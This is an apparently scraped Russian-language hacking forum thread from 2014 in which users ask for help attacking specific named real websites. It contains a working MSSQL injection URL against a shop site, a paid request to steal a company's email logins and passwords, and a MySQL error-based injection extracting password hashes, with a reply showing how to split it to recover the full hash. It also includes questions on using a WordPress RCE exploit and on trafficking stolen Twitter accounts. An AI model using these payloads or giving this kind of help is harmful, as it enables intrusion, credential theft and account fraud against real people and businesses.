ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
08.01.2014, 23:35
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от Xvir
Xvir said:
Ребята помогите раскрутить mssql не как не доходит!
http://www.ekb.spk.ru/spkekb/shop/prod_detail/_t_/prod=krug_nerzhaveyuschii
http://www.ekb.spk.ru/spkekb/shop/order.asp/_t_/prod=krug_nerzhaveyuschii'+or+1=(select+top+1+tabl e_name+from+information_schema.tables+where+table_ name+not+in+('PrValues','SAP_Param5'))--
|
|
|
09.01.2014, 18:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
4378
Репутация:
0
|
|
Друзья у кого нибудь есть желание за возногрождение поработать на этим сайтом tehkomplekt-ural.ru а именно мне нужно все логины и пассы почты их если что пишите в личку
|
|
|
|
09.01.2014, 20:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
4404
Репутация:
0
|
|
Привет всем!)
Помогите пожалуйста докрутить инъекцию, есть она у меня такого вида "
Сообщение от None
and extractvalue(rand(),concat(0x3a,(select concat(0x3a,pass) from server.users limit 1,1))))--
"
Нужный мне хеш она выводит, но не полностью, а только до 32 символов. Как можно обойти это ограничение, и есть ли какое-то готовое решение? |
|
|
|
09.01.2014, 21:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
4404
Репутация:
0
|
|
Да. но скрипт Hash Id эго тип хеша определить не может.
Сообщение от None
46f94c8de14fb36680850768ff1b7f2
|
|
|
|
09.01.2014, 21:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
8396
Репутация:
6
|
|
Сообщение от Massay
Massay said:
Привет всем!)
Помогите пожалуйста докрутить инъекцию, есть она у меня такого вида ""
Нужный мне хеш она выводит, но не полностью, а только до 32 символов. Как можно обойти это ограничение, и есть ли какое-то готовое решение?
and extractvalue(rand(),concat(0x3a,(select mid(pass,1,31) from server.users limit 1,1))))--
and extractvalue(rand(),concat(0x3a,(select mid(pass,32,31) from server.users limit 1,1))))--
Сообщение от K800
K800 said:
У этого хэша 31 символ, а не 32
У него еще символ на конкатенацию ушел
|
|
|
|
09.01.2014, 21:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
4404
Репутация:
0
|
|
Спасибо большое!!!
|
|
|
|
10.01.2014, 21:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
46989
Репутация:
20
|
|
Как использовать эту уязвимость ? http://vagosec.org/2013/12/wordpress-rce-exploit/
|
|
|
|
11.01.2014, 00:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
953
Репутация:
0
|
|
Подскажите в какую сторону копать по добыче акков твиттера. Все онлайн-магазы пишут что аккаунты с дампа. Не брут, не свежерег. Иньецкии в базы?
|
|
|
|
11.01.2014, 01:08
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от websheff
websheff said:
Подскажите в какую сторону копать по добыче акков твиттера. Все онлайн-магазы пишут что аккаунты с дампа. Не брут, не свежерег. Иньецкии в базы?
Просто есть приватная уязвимость на сайте твиттера, которая позволяет каждый день сливать от туда по 50-100к акков.
|
|
|
|
11.01.2014, 01:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
953
Репутация:
0
|
|
Сообщение от kingbeef
kingbeef said:
Просто есть приватная уязвимость на сайте твиттера, которая позволяет каждый день сливать от туда по 50-100к акков.
получается все селлеры барижат одними и теми же акками? Или на каждого 50-100к акков?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид